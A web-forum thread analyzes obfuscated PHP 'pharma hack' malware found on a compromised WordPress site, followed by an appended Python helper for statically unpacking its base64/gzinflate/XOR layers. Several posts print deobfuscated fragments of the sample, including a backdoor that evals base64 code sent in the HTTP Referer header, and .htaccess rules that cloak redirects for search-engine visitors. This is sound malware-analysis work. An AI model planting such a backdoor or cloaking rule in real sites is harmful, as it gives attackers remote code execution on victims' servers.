script analysis anyone?

bad_brain
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
Location: In your eye floaters.

script analysis anyone?

Post by bad_brain »

if anyone of you is bored or is simply up for a little challenge have a look at the script attached.
found it on a customer site I am re-doing, I am not sure what it is doing and I also have no time to analyze it.....mab converted some of the hex in it though and it's malicious with a 99.9999999% chance.

what makes it interesting is the effort that was obviously put into it by using base64 AND hex, additionally there's an odd rewrite rule placed in the .htaccess which I have never seen before in context with such scripts:
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|ANTIPIDERSIA) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol)
RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]
Attachments
main.zip
(3.81 KiB) Downloaded 71 times

lilrofl
Siliconoclast
Posts: 1363
Joined: 28 Jan 2009, 17:00
Location: California, USA

Re: script analysis anyone?

Post by lilrofl »

I can't download the file on this machine, but I will totally take a look at it. Preliminarily it looks like an implementation of the WordPress pharma hacks.

Traditionally pharma works like:

A conditional redirect is added based on the user agent or user referrer. Many times there is an included rewrite condition as well by file extension like:

Code:

RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
The redirection is to a php script, main.php in this case which will receive the requested information and the URL of the requested information.

Main.php then opens the requested URL and reads it. If main.php finds appropriate html tags to add the spammy payload (found in main.php) it does so.


Re: script analysis anyone?

Post by bad_brain »

nice... :D
I have to admit I usually don't really check the background of such scripts when I find them on customer sites (sites of customers that just started to work with me, that is; sites I take care of already usually don't run on a 2 year old WordPress 3.3.1 install like this one :lol: ).

this one caught my attention though because it differs from the usual plain text eval(base64_decode( crap, the encryption/encoding makes it more sneaky and "professional".


Re: script analysis anyone?

Post by lilrofl »

I worked on it for a while, it's a base64_decode nightmare lol.

You are totally right, it is super hard to hide the eval(base64_decode( portion of PHP malware; this one does so with:

Code:

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28
which translated out of hexadecimal is:

Code:

preg_replace("/.*/e","eval(base64_decode("
the /e in preg_replace has been deprecated and will usually throw an error, except for

Code:

error_reporting(0)
If you break the gibberish at the preg_replace bit and attack the middle gibberish, which we know is base64, you get two new nested functions which factor down to three others:

Code:

$xtDE4yoxcmQ4S=base64_decode("YmFzZTY0X2RlY29kZQ==");
//decodes to base64_decode
$xjQCBpbTLvuG=base64_decode("c3RybGVu");
//decodes to strlen
$xmqSEAfSt8Y=base64_decode("Y2hy");
//decodes to chr
$xDjQUHQSNMUgk=base64_decode("b3Jk");
//decodes to ord
$x3U9UcEzb5Ar=base64_decode("Z3ppbmZsYXRl");
//decodes to gzinflate
and

Code:

$xWvIIZlBP5yOi=$x3U9UcEzb5Ar($xtDE4yoxcmQ4S($xWvIIZlBP5yOi));
$xUYZ0h2knwt1F=$xjQCBpbTLvuG($xWvIIZlBP5yOi);
and we'll do the third one in a bit.

We can use the equivalence of the first expression to clean up the second one here:

Code:

$xWvIIZlBP5yOi=gzinflate(base64_decode($xWvIIZlBP5yOi));
$xUYZ0h2knwt1F=strlen($xWvIIZlBP5yOi);

$xWvIIZlBP5yOi is the function declared at the beginning of main.php, and we know now that it is encoded with gzdeflate and base64. I'll refer to this variable as dumbFunction, the main snippet of which is:

Code:

parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
    echo '<3456>';
    eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));
    echo '</3456>';
}
We have one more chunk of base64 gibberish from the nested bit above:

Code:

$xxFOLVezAyy='';
for($xy2iVzhaTrUdw=0;$xy2iVzhaTrUdw<$xUYZ0h2knwt1F;$xy2iVzhaTrUdw++){
    $xxFOLVezAyy.=$xmqSEAfSt8Y(($xDjQUHQSNMUgk($xWvIIZlBP5yOi[$xy2iVzhaTrUdw])^1310981518));
}
eval($xxFOLVezAyy);
after cleaning that up with generic transpositions it looks something like:

Code:

$a = '';
for ($b = 0; $b < $c; $b++) {
    $a .= chr((ord($dumbFunction[$b]) ^ 1310981518));
}
eval($a);
(forgive me my formatting, I don't work in php much these days)

and this is about where I hit my brick wall. I had intended to find the spammy bit that I expected to be added to legitimate links, which I have not. I either overlooked some base64 in that rat's nest, or perhaps the chr((ord(dumbFunction[$b])^1310981518)) bit constructs a string to be added.

anyhow, it's super early so I'm going to grab some breakfast maybe I'll get back to this in the afternoon, or maybe someone else will have some insight on it :)


Re: script analysis anyone?

Post by lilrofl »

I was going to fix my formatting so it didn't go off the page... but the edit tab is in the off the page bits :D


Re: script analysis anyone?

Post by bad_brain »

wow, nice work bud! :o
and yeah, it IS hard to analyze, but you did really well so far....I spoke to the customer and she told me they knew the site was compromised but she thought it's fixed by her (former) "IT person". it seems all that was done was to remove the includes in the WP files (at least the variable in the malware script wasn't passed anywhere)...but then: script left online and WP not updated because "some plugins are incompatible".... #-o


Re: script analysis anyone?

Post by lilrofl »

I found an error I made in my original breakdown which led me to this formatting instead of the previous. I'm still not exactly sure what I'm looking at, but it still looks to be reformatting by letter the http_referer. I still expected to see some spammy link in there somewhere but such is life :D

Code:

<?php
error_reporting(0);

$badFunction=
	ini_set('error_log', '/dev/null');
	parse_str($_SERVER['HTTP_REFERER'], $a);
	if (reset($a) == '12' && count($a) == 9) {
		echo '<3456>';
		str_replace(" ", "+", join(array_slice($a, count($a) - 3)));
		echo '</3456>';
	}

$lengthURL=strlen($badFunction);
$array='';
preg_replace("/.*/e","
	for($i=0; $i<$lengthURL; $i++) {
		$array.=chr((ord($badFunction[$i])^1310981518));
	};
",".");
eval($array);

return;
?>
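A small static-unpacking helper for the layering lilrofl worked through in the two posts above (base64-hidden function names, base64 + gzinflate, then the chr(ord(c) ^ 1310981518) loop), added here as an example that is not from the thread or from the sample itself. It also shows why the 32-bit XOR constant collapses to a single byte under PHP's chr(), which only keeps value & 255. The pack_payload() fixture and the benign echo string are constructed for the demo, not taken from the malware.

```python
import base64
import zlib

# The XOR constant exactly as it appears in the decoded loop on the page.
XOR_CONST = 1310981518  # 0x4E23FD8E

# The base64-hidden function names quoted in the thread, in order.
ENCODED_NAMES = ["YmFzZTY0X2RlY29kZQ==", "c3RybGVu", "Y2hy", "b3Jk", "Z3ppbmZsYXRl"]


def decode_names(encoded):
    """Resolve the base64-disguised identifiers to plain PHP function names."""
    return [base64.b64decode(n).decode("ascii") for n in encoded]


def effective_xor_key(const):
    """PHP's chr() reduces its argument to value & 255, so XOR-ing ord() output
    (0..255) with a 32-bit constant only ever flips the constant's low byte."""
    return const & 0xFF


def gzinflate(data):
    """PHP gzinflate() is raw DEFLATE, i.e. zlib with a -15 window (no header)."""
    return zlib.decompress(data, -15)


def unpack_payload(blob, const=XOR_CONST):
    """Reverse the sample's layers: base64 -> gzinflate -> per-byte XOR."""
    inflated = gzinflate(base64.b64decode(blob))
    key = effective_xor_key(const)
    return bytes(b ^ key for b in inflated).decode("latin-1")


def pack_payload(php_source, const=XOR_CONST):
    """Constructed forward transform (test fixture only) mirroring the layers,
    so unpack_payload() can be exercised without shipping the real blob."""
    key = effective_xor_key(const)
    xored = bytes(b ^ key for b in php_source.encode("latin-1"))
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(xored) + comp.flush()).decode("ascii")


if __name__ == "__main__":
    print(decode_names(ENCODED_NAMES))
    print(hex(effective_xor_key(XOR_CONST)))          # 0x8e
    sample = pack_payload('echo "constructed benign payload";')
    print(unpack_payload(sample))
```

Because the key degrades to one byte, the inflated blob can be brute-forced over all 256 keys and checked for a leading `<?php` or `eval(` without knowing the constant at all.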
